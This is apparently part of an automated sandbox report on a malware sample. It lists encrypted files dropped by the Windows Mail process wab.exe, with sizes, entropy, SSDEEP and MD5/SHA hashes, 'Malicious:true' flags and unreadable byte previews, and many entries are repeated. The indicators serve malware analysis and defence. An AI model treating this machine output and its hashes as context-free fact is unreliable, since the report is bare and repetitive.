                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185797
                                                                                          Entropy (8bit):7.9991017668498055
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtsvsqGKR6pAoQ2hUy3B1aViwSGZXq2IaAg+WD4jTRxYpB9o:YzytbGOX6RJfoJhJ1KiVGBOHgHM/RxYy
                                                                                          MD5:CA2CEA24DED48325935EC79B3B1FF67D
                                                                                          SHA1:18ECD7FCAC2F93AA5B9EB2ED065F1595E2D486ED
                                                                                          SHA-256:5150C9E8438F7A42E0C425D79470D01DBAE47B8BDAD873792FB295CA0B6CBA62
                                                                                          SHA-512:0AC25ECAEFB1A8799629F542527EAC115E015DC98267BF0542DE8AB1C14567F8AD5966A947D29FAA7ABE09697B04DD8B61DCAB734E900571B1371CF5FE976FA2
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185797
                                                                                          Entropy (8bit):7.9991017668498055
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtsvsqGKR6pAoQ2hUy3B1aViwSGZXq2IaAg+WD4jTRxYpB9o:YzytbGOX6RJfoJhJ1KiVGBOHgHM/RxYy
                                                                                          MD5:CA2CEA24DED48325935EC79B3B1FF67D
                                                                                          SHA1:18ECD7FCAC2F93AA5B9EB2ED065F1595E2D486ED
                                                                                          SHA-256:5150C9E8438F7A42E0C425D79470D01DBAE47B8BDAD873792FB295CA0B6CBA62
                                                                                          SHA-512:0AC25ECAEFB1A8799629F542527EAC115E015DC98267BF0542DE8AB1C14567F8AD5966A947D29FAA7ABE09697B04DD8B61DCAB734E900571B1371CF5FE976FA2
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185797
                                                                                          Entropy (8bit):7.9991017668498055
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtsvsqGKR6pAoQ2hUy3B1aViwSGZXq2IaAg+WD4jTRxYpB9o:YzytbGOX6RJfoJhJ1KiVGBOHgHM/RxYy
                                                                                          MD5:CA2CEA24DED48325935EC79B3B1FF67D
                                                                                          SHA1:18ECD7FCAC2F93AA5B9EB2ED065F1595E2D486ED
                                                                                          SHA-256:5150C9E8438F7A42E0C425D79470D01DBAE47B8BDAD873792FB295CA0B6CBA62
                                                                                          SHA-512:0AC25ECAEFB1A8799629F542527EAC115E015DC98267BF0542DE8AB1C14567F8AD5966A947D29FAA7ABE09697B04DD8B61DCAB734E900571B1371CF5FE976FA2
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185324
                                                                                          Entropy (8bit):7.9989658830982195
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxS:YzytbGOX6A16mtpmGvFdVT6LELSRDqLl
                                                                                          MD5:D786BC066D6220E4ADB183F8F97ADB58
                                                                                          SHA1:CF1E278BEA994325E841BC85D067B29DEF91C90B
                                                                                          SHA-256:71AFECCA8AF5D08B0DE71EDAC66DC9D25507CE55BFB2BFA773700CAB79692DB9
                                                                                          SHA-512:677FDF5F7E74EC69DC8F8F4C9D2140A1F37C06D667DE5D53A9C4BF9ED1F7C433626E9453CC431200024D99033BC0A582A914DAD241F91EFCE859F636839240B0
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185324
                                                                                          Entropy (8bit):7.9989658830982195
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxS:YzytbGOX6A16mtpmGvFdVT6LELSRDqLl
                                                                                          MD5:D786BC066D6220E4ADB183F8F97ADB58
                                                                                          SHA1:CF1E278BEA994325E841BC85D067B29DEF91C90B
                                                                                          SHA-256:71AFECCA8AF5D08B0DE71EDAC66DC9D25507CE55BFB2BFA773700CAB79692DB9
                                                                                          SHA-512:677FDF5F7E74EC69DC8F8F4C9D2140A1F37C06D667DE5D53A9C4BF9ED1F7C433626E9453CC431200024D99033BC0A582A914DAD241F91EFCE859F636839240B0
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185324
                                                                                          Entropy (8bit):7.9989658830982195
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxS:YzytbGOX6A16mtpmGvFdVT6LELSRDqLl
                                                                                          MD5:D786BC066D6220E4ADB183F8F97ADB58
                                                                                          SHA1:CF1E278BEA994325E841BC85D067B29DEF91C90B
                                                                                          SHA-256:71AFECCA8AF5D08B0DE71EDAC66DC9D25507CE55BFB2BFA773700CAB79692DB9
                                                                                          SHA-512:677FDF5F7E74EC69DC8F8F4C9D2140A1F37C06D667DE5D53A9C4BF9ED1F7C433626E9453CC431200024D99033BC0A582A914DAD241F91EFCE859F636839240B0
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):192334
                                                                                          Entropy (8bit):7.999190326269313
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LIxnK63yLaMkHZoa/gTYEVe+rVaAU26fppBerkoep5o6cBAgubibjuTiNJ+gRMS9:UxnieMM5CeyalxfIegmJbifMw+gd0fAL
                                                                                          MD5:58581B0926C29060EA4CC8EB64F23C5E
                                                                                          SHA1:05BAEBF375B25932FDEB92903EE550E8E61D5F28
                                                                                          SHA-256:2DE011CC705FB6661254EB6EF17632F92FC3739A56703C3FB5EB00E744747144
                                                                                          SHA-512:D4240155286FB7FEC8AC610988BCE8A3F928E74B7B0EA0F10C4897D0ADC85A7B5A426CF39F84CE94FD74AB9381695B5456479B988D089708396A756A133C622F
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193364
                                                                                          Entropy (8bit):7.999084881092969
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMZyUzNADLQBCQQ+ofc2+25K4k2sZKgmXw3uFwMAQfMABjjo7QZb:LURqd+McXDdDZuFwi5Bjjo7o
                                                                                          MD5:383C6704D0A8FB0ECCD1D97D39FD8E63
                                                                                          SHA1:AF21F8F61C8441D32A0B2383F7D8A4BA5AD61E79
                                                                                          SHA-256:404E49494DAE57AABC6D137D53AD0C93DEBF872D7C6D3B83F6F993FFFE31123F
                                                                                          SHA-512:1BF6D25F9C06063F5338134B6DD60056F29DDFEFE3CDAE587FB551FAE269DA8FBAD4BC921DF63107F31C71D73933A9FA4B744CE9EC19F5187E3C5797D9697F54
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185324
                                                                                          Entropy (8bit):7.9989658830982195
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxS:YzytbGOX6A16mtpmGvFdVT6LELSRDqLl
                                                                                          MD5:D786BC066D6220E4ADB183F8F97ADB58
                                                                                          SHA1:CF1E278BEA994325E841BC85D067B29DEF91C90B
                                                                                          SHA-256:71AFECCA8AF5D08B0DE71EDAC66DC9D25507CE55BFB2BFA773700CAB79692DB9
                                                                                          SHA-512:677FDF5F7E74EC69DC8F8F4C9D2140A1F37C06D667DE5D53A9C4BF9ED1F7C433626E9453CC431200024D99033BC0A582A914DAD241F91EFCE859F636839240B0
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185324
                                                                                          Entropy (8bit):7.9989658830982195
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxS:YzytbGOX6A16mtpmGvFdVT6LELSRDqLl
